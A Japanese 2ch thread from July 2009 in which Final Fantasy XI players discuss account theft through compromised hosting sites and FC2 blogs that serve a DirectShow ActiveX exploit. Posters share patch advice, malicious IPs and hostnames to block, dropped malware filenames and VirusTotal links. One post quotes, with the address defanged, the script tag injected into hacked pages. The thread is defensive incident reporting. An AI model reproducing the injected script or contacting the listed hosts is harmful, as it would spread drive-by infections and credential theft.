●● RMT業者の垢ハックが多発している件49 ●●at OGAME
●● RMT業者の垢ハックが多発している件49 ●● - 暇つぶし2ch500:既にその名前は使われています
09/07/07 14:18:56 dFcuYAPG
>>479
手動でkill bitやろうかと思ったけど読んでみたら>>471の1個だけじゃなくて
随分たくさんあるのね。

素直にFix itで自動処理しますたw
thx.

501:既にその名前は使われています
09/07/07 14:33:25 4YyyNnp8
>>484
あいつら何がしたいんだろうな、小学生じゃ有るまいし

502:既にその名前は使われています
09/07/07 14:46:55 2tXQ9gpT
今月のMSUpだてはいつ?

503:既にその名前は使われています
09/07/07 15:05:04 pVOPvsrS
>>471のインプレス記事かな?

Windowsにパッチ未提供の脆弱性、ゼロデイ攻撃も確認される
URLリンク(internet.watch.impress.co.jp)

504:既にその名前は使われています
09/07/07 15:06:48 a4MQtWpx
>>501

何でそういう勘違いに至るんだ?
ハックされたと思い込む何かがあるのかな?

505:既にその名前は使われています
09/07/07 15:20:30 +kcy1I2u
>>500
最初見た情報(SANS等、 >>471 )ではclsid1つだけだったのに
アドバイザリで一気に増えやがったので自分も素直にFix itしますた。

506:既にその名前は使われています
09/07/07 16:35:50 +kcy1I2u
215

IPA URLリンク(www.ipa.go.jp)

507:既にその名前は使われています
09/07/07 17:20:34 OSVr4RTz
猫鯖は栽培業者はまだいる。
ほとんどは一般人になりすましてPTに参加しレベル上げしだしている。
tellは無くなりだしたな。

508:既にその名前は使われています
09/07/07 18:11:26 JLxzJSHP
203

509:既にその名前は使われています
09/07/07 18:43:16 8K5bscLh
>>502
MSの月例アップデートが出るのは第二火曜の翌日。
今月は15日だね。

510:既にその名前は使われています
09/07/07 19:47:33 PeFBeyzv
暑いよ、なんだか脱水気味だよ
229age

511:既にその名前は使われています
09/07/07 20:31:16 wvjYCcXy
>>504
思い込むというより、まず「同じ状況の人間と痛みを分けたい」という腐の行動だな。
まずはそうなった対処を考えるんじゃなく、このショックを分けて、自分の精神苦痛を少しでも和らげたいDNAからくる衝動。
つまりあいつらはウイルスにかかった状態を治したくて来るんじゃ無くて、まずとにかく話しをして、自分のストレスを解消したいだけなんだよ。
だから、マトモに相手するだけスレも気持ちも無駄。
まず「パソコンを窓から投げ捨てろ」と、あえて自虐レス返して、一定時間クールダウンさせた方がいいんだよ。

512:既にその名前は使われています
09/07/07 22:01:08 QX0msdo7
270

513:既にその名前は使われています
09/07/07 22:18:17 BfgpQ7Xc
URLリンク(www.famitsu.com)
今号は、田中プロデューサーインタビューの最終回となっています。

●ワールドごとの人口の偏り
●レベルキャップが75になった理由
●田中さんの趣味はのぞき?
●『FFXI』の今後
(中略)

来月からは、あのチームのインタビューが始まるので
引き続きのご愛読をよろしくです!



あのチームとは!?
まぁ、毎号立ち読みですけど

514:既にその名前は使われています
09/07/08 00:14:24 55n8LsHH
      M
     (Θ∋
   ,,,,,;(( ゚Д゚)) <266カラage
  ,.;゙; (ノ."""';)
  `'ヾ;, ,.  , .;'
     '∪''∪



515:既にその名前は使われています
09/07/08 02:04:29 RbNKCtE2
寝る

516:既にその名前は使われています
09/07/08 04:00:21 mFlLvDDa
207から、おはようございます

517:既にその名前は使われています
09/07/08 08:02:34 LxlDzyyQ
232位らしい

518:既にその名前は使われています
09/07/08 08:37:33 PZ3M2e2B
Fc2がまたヤバイかもしらん


519:既にその名前は使われています
09/07/08 10:01:52 I30xqQsE
224

520:既にその名前は使われています
09/07/08 12:32:33 Q25mUyZd
糞スレ乱立注意喚起

521:既にその名前は使われています
09/07/08 13:59:13 YyzgWPL5
246

522:既にその名前は使われています
09/07/08 14:44:54 vpa5VW1N
毎度おなじみ 4gameranking の中身が入れ替わってた

wikiwikiとかではやったこの脆弱性が使われてます
URLリンク(www.microsoft.com)
回避策はこっちのFix it
URLリンク(support.microsoft.com)

FF以外の人も見てると思うので周りに危ない人いたら教えてあげてね!

523:既にその名前は使われています
09/07/08 15:00:37 LxlDzyyQ
三時休みィ

524:既にその名前は使われています
09/07/08 15:48:31 vpa5VW1N
VALUE DOMAINってどうよ? part33
スレリンク(hosting板)

工作員がなかったことにしようとしてるみたいなんだけど
本当になかったことになりそうでこわい
流れがひどい

525:既にその名前は使われています
09/07/08 16:01:45 i8hdx3XA
でも魚拓とられてるしなぁ。WIKIWIKIも。

526:既にその名前は使われています
09/07/08 17:14:13 cBIrzlos
age

527:既にその名前は使われています
09/07/08 18:17:42 YyzgWPL5
216

528:既にその名前は使われています
09/07/08 18:26:32 LxlDzyyQ
したらばにある蛇板にて

292 名前:蛇の名無しさん 投稿日: 2009/07/08(水) 01:58:22 ID:gSpDO6Kk0
報告は無いけど、一昨日バンがあったらしい。
外人のフレが「知り合いがバンされてマジへこむ」とテル送ってきた。

529:既にその名前は使われています
09/07/08 18:33:36 U23NDVsN
VALUE-DOMAINは改竄を告知するどころか、xreaのアクセス解析サービスページも改竄されて
騒ぎになってますな。
このスレではおなじみのfccja一派がwikiwiki.jp/VALUE-DOMAINのサイトを改竄して
広めようとしているマルウェア対策。

(1/2)
■DirectShowの脆弱性対策(Windows XP/Windows Server 2003向け)
↓で「回避策を有効にします」のFix itを実施。
マイクロソフト セキュリティ アドバイザリ:
Microsoft ビデオの ActiveX コントロール脆弱性により、リモートでコードが実行される.
URLリンク(support.microsoft.com)

※Windows Vistaはこの脆弱性の影響を受けないとのこと。

■Adobe Readerの脆弱性対策
[ヘルプ]-[Adobe Reader*について]を実行してバージョンを確認。
9.1.2/8.1.6/7.1.3になってなければバージョンアップが必要。

※[編集]-[環境設定]でツリーから[JavaScript]を選び、
 [Acrobat JavaScriptを使用]チェックボックスのチェックを外すとより安全かも。

530:既にその名前は使われています
09/07/08 18:35:10 U23NDVsN
(2/2)
■Adobe Flash Playerの脆弱性対策
↓でインストールされているFlash Playerのバージョンを確認。
Adobe Flash Player のバージョンテストページ
URLリンク(www.adobe.com)
10.0.22.87/9.0.159.0になっていなければバージョンアップが必要。

※IEとそれ以外のWebブラウザではFlash Playerのプログラムが異なるので、
 個別にバージョンチェック/更新しなければならない。

■PG2やパーソナルファイアウォールでアクセスを遮断すべきIPアドレスとホスト名
110.165.41.103(リネージュ資料室さんのMMORPGトロイリストにはwww.hellh.netとして登録済み)
203.89.183.204
www.fccja.meibu.com

531:既にその名前は使われています
09/07/08 18:37:51 rNFCem0b
>>528
ワールド移転DUPEの対処でもあったのかな、時期的に考えて。

532:既にその名前は使われています
09/07/08 19:45:10 yl3kZ6Z0
age

533:既にその名前は使われています
09/07/08 20:15:09 i8hdx3XA
>>530
fccja.com 114.113.130.112 も
併せてブロックをおすすめします(繋がりませんけど)。

534:既にその名前は使われています
09/07/08 20:39:14 eWWDS6Ws
VALUE DOMAINってどうよ? part33
スレリンク(hosting板)

511 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2009/07/08(水) 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー URLリンク(ax.xrea.com)
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?

てことで アクセス解析の方もやばいみたいです。

広告のときみたいにラウンドロビンなのか、スクリプトが混入してる場合としてない場合がある。
(もしくは 混入してる側で短時間に修正してるのか?)

535:既にその名前は使われています
09/07/08 20:56:12 +Vn8PMdO
セキュリティ板の「地上最強のウィルススレ」というところに
入ったとたんカスペルスキーが反応してトロイの木馬反応
「隔離しました」とでたけれど…
だいじょうぶなんでしょうか?

536:既にその名前は使われています
09/07/08 20:59:40 i8hdx3XA
>>534
2台あって1台がやられてる。

537:535
09/07/08 21:21:22 +Vn8PMdO
どうもスレのHTM自身を「トロイの木馬」として隔離している様子です
カスペルスキーの誤検知かもと思うんですけど
どうでしょうか


538:既にその名前は使われています
09/07/08 21:23:13 nheFJ9zI
う~ん、だめでしょうね~

539:既にその名前は使われています
09/07/08 21:25:37 8xGx54ht
ウィルス定義名でググるとか
やることやってから書き込みたまえ

540:535
09/07/08 21:29:07 +Vn8PMdO
Exploit.HTML.Mhtです

541:既にその名前は使われています
09/07/08 21:30:10 t/3rL3oO
ワラタwwwwwwww

542:既にその名前は使われています
09/07/08 21:33:57 n8ouOwQM
ウイルスコードに反応してるだけだと思うよ

543:535
09/07/08 21:34:47 +Vn8PMdO
まさかセキュリティ板にウィルス情報確認しに行ってこんなことになるなんて…orz

544:既にその名前は使われています
09/07/08 21:35:33 U2RUDETI
MS04-025の脆弱性ってどんだけー

545:535
09/07/08 21:36:20 +Vn8PMdO
>>542
はい、たぶんそうだと思うんですけど
いきなりカスペ反応したので驚いてしまいました

546:535
09/07/08 21:40:16 +Vn8PMdO
だいじょうぶだとは思ったんですけど
カスペの検知音で驚いてしまって・・・
どうもすみませんでした

547:既にその名前は使われています
09/07/08 22:17:19 PpLR8DU2
カスペの検知音はやばいよなwww
すげえ焦らせてくれるwwww
その対応を迫る文章も焦ってる時に見ると混乱するwww

548:既にその名前は使われています
09/07/08 23:46:03 YyzgWPL5
243

549:既にその名前は使われています
09/07/08 23:47:25 U23NDVsN
今さらだけど、110.165.41.103から落ちてくるファイルのVirustotalスキャン結果。

・go.jpg(DirectShowに接続するActiveXコントロールの脆弱性を突くJavScript)
 URLリンク(www.virustotal.com)
・f.gif(中身はexe)
 URLリンク(www.virustotal.com)
・t.gif.gif(自己展開CAB)
 URLリンク(www.virustotal.com)
・csrss.exe(自己展開CABに含まれるexe その1)
 URLリンク(www.virustotal.com)
・lass.exe(自己展開CABに含まれるexe その2)
 URLリンク(www.virustotal.com)

変造PDFやSWFは省略。
上記は7/6~7/7に拾ったもの。マルウェアが更新される、あるいはすでにされている可能性もあるので参考まで。

550:既にその名前は使われています
09/07/09 01:05:18 6Z5we7rY
go.jpgは2つある(dirとdir2)けど、まぁ検出率は似たようなもんかと。

551:既にその名前は使われています
09/07/09 01:06:20 mi6+h2Ty
寝る前にあげとこう

552:既にその名前は使われています
09/07/09 02:16:12 NCQDB8zp
203

553:既にその名前は使われています
09/07/09 03:13:02 boHQMUzg
あぐり

554:既にその名前は使われています
09/07/09 03:21:35 hQtHLzBK
_・)各鯖のブラッドウッド原木流通状況(7/1~7/7)(・w
URLリンク(minus-k.com)
_・)各鯖のブラッドウッド材流通状況(7/1~7/7)(・w
URLリンク(minus-k.com)
_・)各鯖の珊瑚のかけら[stack]流通状況(7/1~7/7)(・w
URLリンク(minus-k.com)
_・)鯖全体のブラッドウッド原木流通量推移グラフ(08/04/30~09/07/07)(・w
URLリンク(minus-k.com)
_・)鯖全体の珊瑚のかけら[stack]流通量推移グラフ(08/11/19~09/07/07)(・w
URLリンク(minus-k.com)

今回は6月末に何かあったのか原木の流通量は減ったのですがまだ喜ぶほどの変動幅では無く、
幾つかの鯖では生き残った業者が活動を活発化し順位が大きく入れ替わっています。
また今回は何故か珊瑚の流通量が急増したのですがブログ主が言っていた様にこれも栽培の方の損失を埋め合わせる為の
業者の金策活動の一環なのでしょうか。真相は不明ですが各上位鯖民は引き続き監視と通報を宜しくお願いします。

555:既にその名前は使われています
09/07/09 03:38:35 hQtHLzBK
_・)炎のクリスタル[stack]在庫量推移グラフ(09/06/17~09/07/08)(・w
URLリンク(minus-k.com)
_・)炎のクリスタル[stack]価格推移グラフ(09/06/17~09/07/08)(・w
URLリンク(minus-k.com)
_・)水のクリスタル[stack]在庫量推移グラフ(09/06/17~09/07/08)(・w
URLリンク(minus-k.com)
_・)水のクリスタル[stack]価格推移グラフ(09/06/17~09/07/08)(・w
URLリンク(minus-k.com)

聞いた話では栽培業者が消えていたらしくグラフの方にもその影響が若干見受けられます。
炎・水クリ共に価格は下落傾向にありますし水クリの在庫も一時期凄い事になっていたので業者に何かあったのは確かなのですが、
昨日辺りからまたドカンと捌けてしまっていますので多分もう新たな栽培キャラの配置を終えて活動を再開しているものと思われます。
火山の様に執拗な対処が継続的に行われるかどうかはもう暫く見守らなければ判りませんが、
こちらもやはり一日も早い根本的対策が望まれます。

556:既にその名前は使われています
09/07/09 03:50:20 oVDR2nDY
栽培キャラが激減したあたりから宣伝テルまったく来なくなったズラ

557:既にその名前は使われています
09/07/09 05:45:22 b/AYrYSJ
valueとxreaの、ネトゲのパス抜きが目的っぽいなw
中華業者、いいかげんにしろよ・・・

558:既にその名前は使われています
09/07/09 07:54:57 xT8E7iJT
>>554
蛇鯖が八位にいるのが凄く悲しいです。

559:既にその名前は使われています
09/07/09 09:45:16 CLr5FWKb
久しぶりに ヌルポ上げ

560:既にその名前は使われています
09/07/09 09:48:17 M3jrYl5F
h○○p://seekdays.blog70.fc2.com/

fc2トロイくらってる?

561:既にその名前は使われています
09/07/09 09:49:20 yAqDUZR2
ガッ sage

562:既にその名前は使われています
09/07/09 09:49:35 CLr5FWKb
偶然かもしれんが この一週間RMTテルが来ない Kujata鯖

563:既にその名前は使われています
09/07/09 09:59:15 9Aij+m0N
送信フィルターされてることに気づいてないだけじゃね

564:既にその名前は使われています
09/07/09 11:03:32 HIWlvhQg
>>560 Xreaのとおなじやつで改ざんされてるね。
フッターのテンプレート作者へのリンクのしたあたりに
<script src=http:すらすら1856317799ころん888/jp○js></script>

565:既にその名前は使われています
09/07/09 11:05:02 59YBYDH6
うちの鯖、前ほど鉱山区前賑わってないけど水クリ値段元に戻ってたな

566:既にその名前は使われています
09/07/09 11:18:54 NpGaYC77
カスペのオンラインスキャンがファイルパターンの更新できなくて使えないのだが
他にオススメのオンラインスキャンあったら教えてくれ
上のブログよくみてたのでちと不安

なにかでたらココで報告する

567:既にその名前は使われています
09/07/09 11:59:33 nwj4nTTp
AHのGoogle ADSにRMTが全くでなくなってるね

568:既にその名前は使われています
09/07/09 12:29:50 HvQrp/68
オンラインスキャンでぐぐれよ馬鹿

569:既にその名前は使われています
09/07/09 12:32:48 pJlb07yK
栽培業者って壊滅したの?

570:既にその名前は使われています
09/07/09 12:37:09 xT8E7iJT
>>567
いやいや、『FF11ギルの激安販売店』なるモノが今表示された。
サイト貸してる所は商売なんだから完全回避は難しかろう。

571:既にその名前は使われています
09/07/09 12:44:55 0fUeuyNV
>>564
カスペなんかで弾いてるなら問題ないね、これは

572:既にその名前は使われています
09/07/09 12:53:02 nwj4nTTp
>570
まだでるのか、うちは口臭いばっかりだよw

573:既にその名前は使われています
09/07/09 14:18:47 6Z5we7rY
232

Safari4.0.2リリース
脆弱性の修正あり

VLCMediaPlayer1.0.0リリース

574:既にその名前は使われています
09/07/09 14:38:58 5pBsFyv3
最近RMTtellがまったくないな。
GMが言っていた抜本的対策を行ったのかな?

575:既にその名前は使われています
09/07/09 15:02:10 6Z5we7rY
AIONでBOT育成中なんじゃね?

576:既にその名前は使われています
09/07/09 15:10:43 3DmFG5HX
Kujataは数時間、北サンドにGfghfmghcfhxgnxってのがたちっぱだけど、
RMTtellはきてないね。でも対策を仕込めるようなメンテって最近あったっけ?

577:既にその名前は使われています
09/07/09 15:11:22 xT8E7iJT
>>575
あ~ナンか既に8000アカウント程処罰あったらしいな、AION。

578:既にその名前は使われています
09/07/09 15:34:06 gTfStaoL
改竄に関するお知らせとお詫び
URLリンク(wikiwiki.jp)
netcraftのサーバレポート
URLリンク(toolbar.netcraft.com)

この告知とnetcraftのサーバレポートを見ると、WIKIWIKI.jpのサーバのうち、
「www.wikiwiki.jp = s103.xrea.com」が改竄されていたので、xreaから
interlinkに移したと。現在は「www.wikiwiki.jp = my2.interlinkor.jp」。
6日まで改竄されたままだったエラーページもwww.wikiwiki.jpだったし。

とりあえず経緯を公表したWIKIWIKI.jpは評価する。
VALUE-DOMAINにはしっかりしてほしいね。

579:既にその名前は使われています
09/07/09 15:53:26 uNP2RYyL
wikiwiki側もVALUE DOMAINに怒ってそうな感じだな

580:既にその名前は使われています
09/07/09 16:15:09 rDOn8LPO
●● RMT業者の垢ハックが多発している件49 ●●
スレリンク(ogame板)

ここが参考になるな

581:既にその名前は使われています
09/07/09 16:16:05 M3jrYl5F
>>580
うむ、すごく参考になった

582:既にその名前は使われています
09/07/09 16:16:07 rDOn8LPO
>>580
誤爆すまん
ついさっきこれ関係でラテールの緊急メンテが入ったもんで

583:既にその名前は使われています
09/07/09 16:16:33 pKo85ZMU
>>580
そんなことないです(///

584:既にその名前は使われています
09/07/09 16:19:30 M3jrYl5F
>>582
ラテーヌだかラヴォールだかはっきりしろ!
とか一瞬思ったが何の関係もない

585:既にその名前は使われています
09/07/09 16:22:45 GX9bT2q5
グランドファンタジアの運営が
ハッキング対策に神認証システムを採用したらしい

586:既にその名前は使われています
09/07/09 16:23:31 Twtp5O/z
複数アカ栽培の廃外人が一斉バンなのにお前らはFFか
スレリンク(ogame板)

1 名前:既にその名前は使われています 投稿日:2009/07/09(木) 12:41:15 ID:M3jrYl5F
URLリンク(ffxi.allakhazam.com)
URLリンク(ffxi.allakhazam.com)
URLリンク(ffxi.allakhazam.com)
URLリンク(www.bluegartrls.com)

外人「俺らはRMTなんてやっていない!ただ、大量の倉庫キャラで栽培してただけだ!!!」
■e「YOU BAN」

587:既にその名前は使われています
09/07/09 16:24:24 rDOn8LPO
ラテールはここです
スレリンク(mmo板)

588:既にその名前は使われています
09/07/09 16:33:44 uNP2RYyL
>>587
見たけどここ見てもその人たちには参考にならないと思う
あとGenoとは違うんでGeno感染チェックをしても無駄です

589:既にその名前は使われています
09/07/09 17:49:46 j1FHmSzb
スクエニアカ取得及び
セキュリティトークン設定ってどこでやるの?

590:既にその名前は使われています
09/07/09 18:12:31 6Z5we7rY
トークン入ってる箱の蓋の裏だかに書いてないか?

591:既にその名前は使われています
09/07/09 19:04:00 PxCzpMfU
スクエニアカウントなら
URLリンク(secure.square-enix.com)
これのことかな?

592:既にその名前は使われています
09/07/09 19:04:14 Fqd1/xoG
>>586
芋づる君に引っかかったんじゃね?


593:既にその名前は使われています
09/07/09 19:09:36 DsGGg0lD
誰かVALUE DOMAIN系で運営しているサイトをリストアップして
ブラックリストサイト作ってくれんかな・・・

594:既にその名前は使われています
09/07/09 20:01:51 uNP2RYyL
そんなの作っても意味ないだろうけどほしいなら自分でやればいいじゃない

595:既にその名前は使われています
09/07/09 20:15:37 DsGGg0lD
こういったサイトは根絶して欲しいです

596:既にその名前は使われています
09/07/09 20:47:36 PxCzpMfU
星ゅ

597:既にその名前は使われています
09/07/09 21:08:41 1f/SFmUR
SYSTEM32内WBEM内HB32.dllがPOLとぶつかって、
POLが落ちてない(普通に行動できる)のに、
「異常終了しました。MSに報告するか」と出る。

カスペルさん無反応なのでセーフモードから削除したら、今の所問題なし。
不可視で作成1990年でぐぐってもろくに詳細が分からない。
他ゲのWIKIが半分文字化けしているページが有ったりで、
そこが怪しい気がする。

もちろんウィルスじゃないかもしれないが。

598:既にその名前は使われています
09/07/09 21:12:10 PxCzpMfU
>>597
いちどvirustotalに投げてみればよかったのにゃ

599:既にその名前は使われています
09/07/09 22:05:40 6Z5we7rY
211

600:既にその名前は使われています
09/07/09 22:06:16 1f/SFmUR
ありがとうございます。
次から試してみます。
セーフモードから削除すると、跡形も残ってなかったです。
削除する前は3分もたたずに連続して落とされたのに、
1時間経っても平気なので、HB32.dllが原因だったのは間違いなさそう。

601:既にその名前は使われています
09/07/09 22:08:24 y8rJg2aH
ファイル復元ソフトとかで、復活させてから、安全なディレクトリに移動して、
virustotal に投げてみるとか?
regsvr32 /u もやっとくと、いいかも。

602:既にその名前は使われています
09/07/09 22:48:06 tMmV7QeR
HB32.dllってググったら、海外ページでwormとか書いてあるんだが…
セキュリティホール作る奴か。

603:既にその名前は使われています
09/07/09 23:25:29 uwQNhJGl
PrevxのDBではworm扱いされてる。
URLリンク(www.prevx.com)
こちらでの評価も、Remove寄り。Virustotalのリザルト付き。
URLリンク(www.freefixer.com)
URLリンク(www.virustotal.com)

604:既にその名前は使われています
09/07/09 23:36:43 PxCzpMfU
6/30時点かー
いまだと敏感なところがマルウェア判定出してそうだね
FF阻害するけどパス抜きじゃないってところか

605:既にその名前は使われています
09/07/09 23:39:30 xT8E7iJT
どでかいbanあったなら月半ばでも途中経過として数字出して欲しいなぁ~
丸々一月後だよな、発表されても。

606:既にその名前は使われています
09/07/10 00:50:48 cTO2LqTq
おやすみ ぬるぽ上げ

607:既にその名前は使われています
09/07/10 01:52:09 eckJK2lU
雑談スレ落ちるほど賑わっているので上げますね。

608:既にその名前は使われています
09/07/10 01:52:14 xRhiDcI1
鉱山区が常時120,130人とかのふざけた状態だったからな
今は60,70になってる
半分て・・
まぁそれにしても 業者ちゃん ぷぎゃーwwwwwm9m9
戻ってきてもまた通報しちゃいますんで4649ww

609:既にその名前は使われています
09/07/10 01:59:26 eckJK2lU
雑談スレ落ちてなかった、単においらの検索能力不足だ。

610:既にその名前は使われています
09/07/10 02:03:34 N8/te/+g
セキュリティ対策ソフト、怪しいプログラムを動かさないようにして、
『感染防御』する機能って、あるみたいだけど、メーカーの情報じゃ比較しにくいね。
パターンファイルで検知っていう手法はもう、時代遅れな気がするのに。
パターンファイルが提供されたときには、ウィルス変化完了してて、
手遅れで意味無い気がしてきた。

611:既にその名前は使われています
09/07/10 02:56:51 qPw5A+mP
今度はmmoniceからテルきたお
一応、仕事はしてたみたいだな、□e

612:既にその名前は使われています
09/07/10 03:02:23 xs/77GCQ
>>564
今もうソースから削除されてる?
弾いてるとは言え、またfc2改ざんされてんのかよw

613:既にその名前は使われています
09/07/10 03:37:16 2vYuJAg/
>>612
修正したというエントリがあがってるね。
昼休み時間中には修正しきれないからと、正午前に一時閉鎖してた。
FC2は今までが今までだから継続するのを個人的には勧めたくないけど、
決めるのはブログ開設者だからなあ。

fc2と言えば、第七猫さんのfc2ブログがまた改竄されてる。
閉鎖してShinobiに移転したような気がするけど、パスを抜いた業者が
罠を仕込んだうえで再開させたのかもしれない。

614:既にその名前は使われています
09/07/10 04:00:31 yKRWk35f
うぜええ
また業者のテルが復活しやがった

615:既にその名前は使われています
09/07/10 04:05:35 MLWp24wU
36$
いきなり上がってるな

616:既にその名前は使われています
09/07/10 04:49:02 74XxADxv
業者テルのキャラ名長くなって通報しづらくなったね。
ユーザーインターフェースのショボサが嘆かわしい。

617:既にその名前は使われています
09/07/10 05:20:04 +WJMWBiO
>>602
セキュリティソフトの宣伝ページというか、
ウィルス感染詐欺ページかと思って閉じたページが実はまともなサイトだったのかな。
英語で一番上宣伝だと、全て怪しくて.....
一応内容分かっても、詐欺なのかどうか判断するだけの語学力なくて....orz

カスペルさんは対応早い印象有るけど、そうでもないのですね。
POLとか反応過敏なソフト入れてない人は、気付いてないウィルス多そう。
ntdllとかも当たってたから、ウィルス疑わずに、
OS再インストする人も多いのかも。
実際に被害にあった人と感染した人の差は大きいのかな。

FF14はかなりしょぼくてもPS3でやろう。
ありがとうございました。

618:既にその名前は使われています
09/07/10 05:32:00 74XxADxv
>>617
サイトの内容をランダムに変える事によって安全であるかの様に装ったり、
感染源を特定させない効果を狙う事もあるので語学力云々じゃないことも希に良くある。

君子危うきに寄らず。で自分からは安全なサイトだよ、
とは口が裂けても言わない様にするのが一番。

ゼロデイ、つまりノーガード状態になる事も希に良くあるので
過信は禁物なのよね~

619:既にその名前は使われています
09/07/10 07:03:02 tEc8umwy
結局今回はブログ関係はFC2だけか?
Xreaといい、以前やられたところがまたやられた感じか

620:既にその名前は使われています
09/07/10 08:11:53 m1xlWqa4
デジロックは今すぐつぶれるべき

621:既にその名前は使われています
09/07/10 09:28:45 cYTtvqfN
>>619
FC2は他では見かけないから長ズボンブログのPCがやられて改ざんされただけだと思う。
今残ってるので影響デカいのはXREAのアクセス解析。

622:既にその名前は使われています
09/07/10 09:28:51 KW5O+dIE
244

623:既にその名前は使われています
09/07/10 12:02:36 9oTKd/uz
関係ないと思うがこれFC2ブログのことらしい

大手ブログサイトでXSS脆弱性
URLリンク(www.netsecurity.ne.jp)

XreaもFC2も過去に何度も改ざんしてるんで
あちらさんもやり方分かっててやりやすいんだろう

624:既にその名前は使われています
09/07/10 12:23:38 cYTtvqfN
>>623
ぎゃーっ

625:既にその名前は使われています
09/07/10 12:25:52 KEG9hoWI
どう見てもfc2です本当にありがとうございました

626:既にその名前は使われています
09/07/10 12:32:15 TzRWpTMK
長ズボンも管理する意識が最低レベルのクズだからな
なんの対策もしないで感染するのはおまえらの責任って態度だからね

つか仕込まれた本人もPC感染してるんだろ?w

627:既にその名前は使われています
09/07/10 12:34:03 0+hrJDgL
URLリンク(netsecurity.blog77.fc2.com)

リンク先をたどるとfc2って書いてあるわけだがw

628:既にその名前は使われています
09/07/10 13:42:09 cTO2LqTq
食後の保守上げ
ついでに ヌルポ

629:既にその名前は使われています
09/07/10 13:46:30 IibU/HLx
Kujata

栽培業者、せっせと復活に向けての仕込みを続けている様子。
Ujrgpが雑貨屋で植木鉢を購入。Ujrmn,Ujrmnnのような2体セットで植木鉢を
受け取りにくる。
一方、モグ前にはSnfw,Rgdf,Gewd,Mngjのような乱打系が例によって待機。
ちっとはAIONの運営を見習えよ。

630:既にその名前は使われています
09/07/10 15:18:21 Fm1ocJuj
あげるよ

631:既にその名前は使われています
09/07/10 15:19:49 cYTtvqfN
VALUEDOMAIN・XREA・WIKIWIKIの騒動、
敵のサーバ(110.165.41.103)が繋がらなくなったので
とりあえずこれがあったら感染というファイル名をコピペしておきますね。
windows\system32 の中に
carrsv.dll
diskcheck.exe
flashaegh.dll
mnpse.dll
ntst.dll

632:既にその名前は使われています
09/07/10 16:49:13 cYTtvqfN
228

633:既にその名前は使われています
09/07/10 16:54:26 47xSet0P
再び228

634:既にその名前は使われています
09/07/10 17:54:40 TpzydXqY
垢ハック食らう前に業者からのスパムTellあったんだけど
なんか関係あるのかな

635:既にその名前は使われています
09/07/10 17:57:17 KEG9hoWI
>>634
提示されたURLを踏んでない限り無関係
何時ごろの話?余裕あったら>>3で報告よろしく

636:既にその名前は使われています
09/07/10 18:35:37 StxZTiq3
ほs


637:既にその名前は使われています
09/07/10 18:38:42 KEG9hoWI
節子それageやない

638:既にその名前は使われています
09/07/10 18:56:25 fvzjJujQ
スクエニアカウント登録したんだけどどこでシリアル入力とかするの?

639:既にその名前は使われています
09/07/10 18:59:08 KEG9hoWI
>>638
トークンのシリアルなら箱の蓋の裏に書いてるURL打ち込む

640:既にその名前は使われています
09/07/10 19:06:47 fvzjJujQ
>>639
シリアル入力&セキュリティ拡張完了です!

これで後はリンクさせればいいだけですよね?

641:既にその名前は使われています
09/07/10 19:20:23 fvzjJujQ
>>639
スクエニアカウント登録情報サイトにて
リンクしました!ワンタイム最高です!

642:既にその名前は使われています
09/07/10 19:23:30 KEG9hoWI
おめでとう。これからも感染しないように気をつけるんだよ

643:既にその名前は使われています
09/07/10 19:30:02 erjxKjkc
>>613
第七猫さんの旧FC2ブログ、普通にパスワード認証画面と移転告知だけど
丸パクリの罠ブログ?どこだろう

644:既にその名前は使われています
09/07/10 19:35:29 IBt/hLEA
>>631
セーフモードで起動して C:\Windows\System32\KcrnaeghDrv.dll が作られてないか
チェックもやったほうがいいね。

必ずセーフモードで起動することが必要。

645:既にその名前は使われています
09/07/10 19:47:08 15KvZBmL
携帯からです
セキュリティトークン導入したものです

これってワンタイムパスワードなしでログインできるように設定はできるんですか?
できるなら少し怖いな…

646:既にその名前は使われています
09/07/10 19:48:50 KEG9hoWI
>>645
そう設定するためにもワンタイムパスが必要だと思う
フィッシングサイトにワンタイムパスをうっかり入力して相手にマッハでログインされない限りは平気

647:既にその名前は使われています
09/07/10 20:01:05 15KvZBmL
>>646
最初にスクエニアカウント登録したときはワンタイムパスワード必要なかったですが

やはり登録したあとは必要になるってことなんでしょうね


有り難うございます!

648:既にその名前は使われています
09/07/10 20:53:49 Fm1ocJuj
リンク設定した後は、スクエニアカウント関係は、ワンタイムパスが求められる。

649:既にその名前は使われています
09/07/10 22:21:35 Zvama8j5
あげる

650:既にその名前は使われています
09/07/10 23:21:27 8m7StpwO
MS、7月の月例パッチはWindows関連の“緊急”3件を含む計6件 -INTERNET Watch
URLリンク(internet.watch.impress.co.jp)

米・韓サイトのDDoS攻撃に用いられたボット感染PC、日本にも存在 -INTERNET Watch
URLリンク(internet.watch.impress.co.jp)

651:既にその名前は使われています
09/07/10 23:44:18 tEc8umwy
>>643
いま検索からはずされてるな
昨日ぐらいまではすぐでたぞ
丸パクリの罠ブログでXreaと例のスクリプト両方仕込んであった

どうみてもFC2側の問題だな
戦士スキーも閉じてるし

652:既にその名前は使われています
09/07/11 00:26:28 hHreHqLZ
またFC2かよ、対策放置しすぎだろ女子高生。



653:既にその名前は使われています
09/07/11 00:40:19 +dU/lqrZ
現役女子高生探偵の推理に背筋が凍った
そろそろ誰かクラクラ送ったげてぇえええww


654:634
09/07/11 00:46:14 EflSYEwf
遅くなったけど埋めてみた

●気付いた日時 7月10日16時頃、トークンが手に入ったのでリンクさせようとしたら
何故かパスが違うといわれ、不審に思いPOLログインしようとした所弾かれ、
AHで履歴をみたら案の定。

●不審なアドレス とりあえずfc2ブログのみ挙げてみる
H○○○:○○nittani.blog90.fc2.com/blog-entry-7.html
H○○○:○○fc2toyoki.blog49.fc2.com/blog-entry-119.html
H○○○:○○ff11pony.blog92.fc2.com/blog-date-20070501.html
H○○○:○○misuramu.blog114.fc2.com

●他人が貴方のIDを利用したことがあるか  NO
●ID・Passの認証方法 ワンタイム無使用 自動ログイン
●他人が貴方の~ネットカフェの利用まで NO
●使ってるOS XP Home SP3
●使ってるブラウザ IE6



655:既にその名前は使われています
09/07/11 00:47:06 EflSYEwf
●使ってるブラウザ IE6
●WindowsUpdateの有無 OS入れるときに一度だけ(二ヶ月ほど前
●FlashPlayerとRealPlayer FlashPlayerのみ導入 Ver10
●アンチウィルスソフト状況 無使用
●その他同上
●ウィルススキャン結果 \Application Data\a.exe\lass.exe spyware?を発見
●スレログやテンプレを読んだか YES
●hosts変更 無
●PeerGuardian2の導入 無
